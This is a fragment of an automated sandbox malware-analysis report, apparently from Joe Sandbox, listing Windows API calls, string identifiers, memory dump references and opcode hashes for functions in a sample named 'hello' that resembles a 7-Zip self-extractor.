                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                        • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                                        • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                        • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                                        APIs
                                        • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                        • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                        • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                        • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                        APIs
                                        • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: FileTime
                                        • String ID:
                                        • API String ID: 1425588814-0
                                        • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                        • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                        • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                        • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000060,?,?,00000000,?,0040D96E,00000000,?,00000000,00000000,000000FF,?,00000001,?,?,?), ref: 0040D91A
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: 938f96ef33963dfecdccb7339ec6814480dc8f914b3861dbfe03219cdb677223
                                        • Instruction ID: 1ceb60bf2594cd826c4dcd58ac8a3e75a9726935558582f6c117c88f0dd7e0c4
                                        • Opcode Fuzzy Hash: 938f96ef33963dfecdccb7339ec6814480dc8f914b3861dbfe03219cdb677223
                                        • Instruction Fuzzy Hash: 4A219372A042858FCF30FF91D98096B77A5AF50358320853FE093732C1DA38AD49D75A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                        • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                        • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                        • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                        • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                        • Opcode Fuzzy Hash: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                        • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                        APIs
                                        • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                        • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                        • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                        • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                        • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                        • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                        • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                        APIs
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                        • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                        • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                        • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                        • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                        • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        • _wtol.MSVCRT ref: 004034E5
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                        • _wtol.MSVCRT ref: 0040367F
                                        • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                        • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                        • String ID: .lnk
                                        • API String ID: 408529070-24824748
                                        • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                        • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                        • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                        • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                        APIs
                                        • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                        • wsprintfW.USER32 ref: 00401FFD
                                        • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                        • GetLastError.KERNEL32 ref: 00402017
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                        • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                        • GetLastError.KERNEL32 ref: 0040204C
                                        • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                        • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                        • SetLastError.KERNEL32(00000000), ref: 00402098
                                        • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                        • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                        • _wtol.MSVCRT ref: 0040212A
                                        • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                        • String ID: 7zSfxString%d$XpA$\3A
                                        • API String ID: 2117570002-3108448011
                                        • Opcode ID: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                        • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                        • Opcode Fuzzy Hash: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                        • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                        • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                        • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                        • LockResource.KERNEL32(00000000), ref: 00401C41
                                        • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                        • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                        • wsprintfW.USER32 ref: 00401C95
                                        • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                        • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                        • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                        • API String ID: 2639302590-365843014
                                        • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                        • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                        • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                        • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                        APIs
                                        • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                        • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                        • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                        • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                        • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                        • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                        • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                        • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                        • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                        • String ID:
                                        • API String ID: 829399097-0
                                        • Opcode ID: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                        • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                        • Opcode Fuzzy Hash: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                        • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                        • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                        • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                        • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                        • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                        • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                        • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                        • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                        • String ID:
                                        • API String ID: 1862581289-0
                                        • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                        • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                        • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                        • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                        APIs
                                        • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                        • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                        • GetWindow.USER32(?,00000005), ref: 00406D8F
                                        • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: Window$AddressLibraryLoadProc
                                        • String ID: SetWindowTheme$\EA$uxtheme
                                        • API String ID: 324724604-1613512829
                                        • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                        • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                        • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                        • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
